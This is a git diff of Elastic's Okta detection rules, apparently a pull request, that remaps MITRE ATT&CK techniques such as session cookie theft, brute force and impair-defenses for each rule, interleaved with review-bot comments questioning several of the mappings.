+name = "Steal Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1539/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.004"
-name = "Web Session Cookie"
-reference = "https://attack.mitre.org/techniques/T1550/004/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
index 48def95c88b..463bd891fd3 100644
--- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
+++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/26"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/01/26"
 [rule]
 author = ["Elastic"]
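Review bot: Same concern as for the multiple-device-token-hash rule: swapping `T1550.004` Web Session Cookie for `T1539` Steal Web Session Cookie re-labels a rule whose observable, judging by the hunk context (`same dt_hash`) and the threshold type, is one device token hash authenticating from several user-agent/OS combinations, i.e. session reuse rather than theft. Keeping `T1550.004` (under Lateral Movement, as the AiTM replay rule in this patch does) alongside `T1539` would preserve that distinction; the tags hunk above also omits the trailing comma after `"Resources: Investigation Guide"` that the other rewritten arrays carry.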
@@ -81,7 +81,15 @@ references = [
 risk_score = 73
 rule_id = "9ed5d08f-aad6-4c03-838c-d686da887c2c"
 severity = "high"
-tags = ["Domain: Identity", "Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Okta", "Data Source: Okta System Logs", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Identity",
+ "Use Case: Identity and Access Audit",
+ "Data Source: Okta",
+ "Data Source: Okta System Logs",
+ "Tactic: Credential Access",
+ "Tactic: Lateral Movement",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -151,30 +159,22 @@ FROM logs-okta.system-*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
+id = "T1539"
+name = "Steal Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1539/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.004"
-name = "Web Session Cookie"
-reference = "https://attack.mitre.org/techniques/T1550/004/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1550.004"
 name = "Web Session Cookie"
@@ -184,3 +184,4 @@ reference = "https://attack.mitre.org/techniques/T1550/004/"
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
diff --git a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml
index 82d4bcc65fb..a27b743a262 100644
--- a/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml
+++ b/rules/integrations/okta/credential_access_okta_authentication_for_multiple_users_with_the_same_device_token_hash.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/17"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/25"
 [rule]
 author = ["Elastic"]
@@ -113,23 +113,29 @@ from logs-okta*
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1110.003"
 name = "Password Spraying"
 reference = "https://attack.mitre.org/techniques/T1110/003/"
+
+[[rule.threat.technique]]
+id = "T1110"
+name = "Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
 [[rule.threat.technique.subtechnique]]
 id = "T1110.004"
 name = "Credential Stuffing"
 reference = "https://attack.mitre.org/techniques/T1110/004/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml
index 2f24bf1da20..72b54d82017 100644
--- a/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml
+++ b/rules/integrations/okta/credential_access_okta_brute_force_device_token_rotation.toml
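Review bot: This hunk un-nests an existing pair: `T1110.003` and `T1110.004` were both children of one `T1110` table and are now split into two `[[rule.threat.technique]]` tables with the same id. That is the opposite of what the T1566 hunk at the top of the patch does (two sub-techniques under one technique), so the patch introduces two conventions at once; unless the schema or a duplicate-technique check requires one entry per sub-technique, the original nested form is the smaller and more common shape.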
@@ -2,7 +2,7 @@
 creation_date = "2024/06/17"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/19"
 [rule]
 author = ["Elastic"]
@@ -122,18 +122,14 @@ FROM logs-okta.system-* METADATA _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.001"
-name = "Password Guessing"
-reference = "https://attack.mitre.org/techniques/T1110/001/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/integrations/okta/credential_access_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml
index 9b00e895d4f..eef4992bb6a 100644
--- a/rules/integrations/okta/credential_access_user_impersonation_access.toml
+++ b/rules/integrations/okta/credential_access_user_impersonation_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/03/22"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,12 @@ references = [
 risk_score = 73
 rule_id = "cdbebdc1-dc97-43c6-a538-f26a20c0a911"
 severity = "high"
-tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"]
+tags = [
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access",
+ "Data Source: Okta",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -70,17 +75,8 @@ event.dataset:okta.system and event.action:user.session.impersonation.initiate
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml
index 78efb62e5d5..5291da1293e 100644
--- a/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml
+++ b/rules/integrations/okta/defense_evasion_attempt_to_deactivate_okta_network_zone.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic"]
@@ -81,13 +81,19 @@ event.dataset:okta.system and event.action:zone.deactivate
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.007"
+name = "Disable or Modify Cloud Firewall"
+reference = "https://attack.mitre.org/techniques/T1562/007/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml
index 038fb4e5f17..7f1bcaf2c10 100644
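Review bot: With the `T1078.004` block removed, this `[[rule.threat]]` keeps a tactic (`TA0006`) and no technique, so `user.session.impersonation.initiate` no longer maps to any ATT&CK technique. If no technique fits an impersonation session (which, as far as I know, Okta only exposes to administrators and Okta support), state that in the rule description so the empty entry is not read as an oversight; otherwise add the intended technique. Labelling the event Credential Access is itself a stretch worth one sentence, since no credential is obtained when an impersonation session is initiated.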
--- a/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml
+++ b/rules/integrations/okta/defense_evasion_attempt_to_delete_okta_network_zone.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/06"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic"]
@@ -81,13 +81,19 @@ event.dataset:okta.system and event.action:zone.delete
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.007"
+name = "Disable or Modify Cloud Firewall"
+reference = "https://attack.mitre.org/techniques/T1562/007/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml
index 4c597f990c3..c2ae0981e52 100644
--- a/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml
+++ b/rules/integrations/okta/defense_evasion_first_occurence_public_app_client_credential_token_exchange.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/09/11"
 integration = ["okta"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/07/02"
 [rule]
 author = ["Elastic"]
@@ -62,7 +62,14 @@ references = [
 risk_score = 47
 rule_id = "6649e656-6f85-11ef-8876-f661ea17fbcc"
 severity = "medium"
-tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: SaaS",
+ "Data Source: Okta",
+ "Use Case: Threat Detection",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -81,39 +88,22 @@ event.dataset: okta.system
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1550.001"
 name = "Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1550/001/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["okta.actor.display_name"]
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml
index 8494737858f..afb56b6df29 100644
--- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml
+++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy.toml
@@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -88,13 +88,19 @@ event.dataset:okta.system and event.action:policy.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml index f67bcff4ab9..497da81d4d9 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -87,13 +87,19 @@ event.dataset:okta.system and event.action:policy.rule.deactivate [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
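Review bot: The new `[[rule.threat.technique.subtechnique]]` block maps deactivating an Okta policy to `T1562.007` "Disable or Modify Cloud Firewall", but an Okta policy governs authentication and session rules rather than network filtering, so the subtechnique name does not describe what `event.action:policy.lifecycle.deactivate` detects. The same block is added for the deactivate-policy-rule, delete-policy, delete-policy-rule, modify-policy and modify-policy-rule rules that follow in this chunk; the network-zone deletion rule at the top of the chunk is the one case where a firewall-like control is actually involved. If only the parent `T1562` "Impair Defenses" is intended for the policy rules, drop the subtechnique block from each of them. The `T1556.009` "Conditional Access Policies" mapping that the delete-policy hunk removes is the entry whose name matches these policy events most closely, so it is worth confirming that replacing it was deliberate.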
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml index 823db9f42f6..d15fdf5794f 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/28" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -88,23 +88,19 @@ event.dataset:okta.system and event.action:policy.lifecycle.delete [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.009" -name = "Conditional Access Policies" -reference = "https://attack.mitre.org/techniques/T1556/009/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml index 7bafae062cb..5b253b86daa 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_delete_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
@@ -87,13 +87,19 @@ event.dataset:okta.system and event.action:policy.rule.delete [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml index ab57bdc871e..2be46aca15c 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -76,13 +76,19 @@ event.dataset:okta.system and event.action:policy.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml index d06439bd616..b163bbcf480 100644 --- a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml +++ b/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_policy_rule.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -85,13 +85,19 @@ event.dataset:okta.system and event.action:policy.rule.update [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml index a3dc9b07157..8c9739a98ea 100644 --- a/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml +++ b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic", "@BenB196", "Austin Songer"] 
@@ -62,7 +62,12 @@ references = [ risk_score = 47 rule_id = "e90ee3af-45fc-432e-a850-4a58cf14a457" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Tactic: Initial Access", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "threshold" @@ -77,21 +82,41 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.threshold] field = ["okta.actor.alternate_id"] value = 5 diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml index 0500cf14163..121e67e54ef 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml 
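Review bot: The rewritten tags list carries only `"Tactic: Defense Evasion"`, while the rewritten `[[rule.threat]]` blocks in the second hunk map the rule to three tactics: Defense Evasion (TA0005), Persistence (TA0003) and Initial Access (TA0001). Each tactic in `rule.threat` should have a matching `Tactic:` tag, so `"Tactic: Persistence",` and `"Tactic: Initial Access",` need adding to the list (or the extra threat entries dropping, if Defense Evasion alone is intended). The added blocks are also packed together without the blank line that separates `[rule.threat.tactic]` from the next `[[rule.threat]]` in the context lines of the other files in this diff, which makes the three entries hard to tell apart when reading the file.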
@@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] @@ -62,7 +62,12 @@ references = [ risk_score = 21 rule_id = "edb91186-1c7e-4db8-b53e-bfa33a1a0a8a" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -73,18 +78,14 @@ event.dataset:okta.system and event.action:application.lifecycle.deactivate [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml index c5ef4a765ea..79b6707bfb6 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
@@ -69,7 +69,12 @@ references = [ risk_score = 21 rule_id = "c74fd275-ab2c-4d49-8890-e2943fa65c09" severity = "low" -tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] +tags = [ + "Use Case: Identity and Access Audit", + "Data Source: Okta", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -81,17 +86,8 @@ event.dataset:okta.system and event.action:application.lifecycle.update [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/okta/impact_possible_okta_dos_attack.toml b/rules/integrations/okta/impact_possible_okta_dos_attack.toml index fe263825367..52c88d548de 100644 --- a/rules/integrations/okta/impact_possible_okta_dos_attack.toml +++ b/rules/integrations/okta/impact_possible_okta_dos_attack.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/02" [rule] author = ["Elastic"] 
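Review bot: After the second hunk the only `[[rule.threat]]` entry of the application-modification rule carries the Impact tactic with no `[[rule.threat.technique]]` at all, whereas the sibling application-deactivation rule in the previous file was given `T1489` "Service Stop" under the same tactic. A tactic-only mapping loads, but it contributes nothing to technique coverage; if no technique is considered to fit `application.lifecycle.update`, a sentence in the commit message saying so would save the next reader from assuming the block was dropped by accident.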
@@ -78,18 +78,19 @@ event.dataset:okta.system and event.action:(application.integration.rate_limit_e [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" [[rule.threat.technique]] id = "T1499" name = "Endpoint Denial of Service" reference = "https://attack.mitre.org/techniques/T1499/" -[[rule.threat.technique.subtechnique]] -id = "T1499.003" -name = "Application Exhaustion Flood" -reference = "https://attack.mitre.org/techniques/T1499/003/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml index 431094faa47..10d46662b9a 100644 --- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml +++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -75,21 +75,17 @@ event.dataset:okta.system and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.id", "cloud.account.id"] 
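Review bot: The added `T1498` "Network Denial of Service" block sits directly under `framework = "MITRE ATT&CK"` without the blank line that precedes every other `[[rule.threat.technique]]` in this diff, so it should be separated the same way the existing T1499 block is. On substance, the hunk context shows the query keying on Okta rate-limit events (`application.integration.rate_limit_e…`), which is application-layer exhaustion; T1498 describes volumetric network-layer flooding, and the `T1499.003` "Application Exhaustion Flood" subtechnique this hunk removes is the entry that names the observed behaviour, so confirm the swap is intended rather than a side effect of dropping subtechniques across the set.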
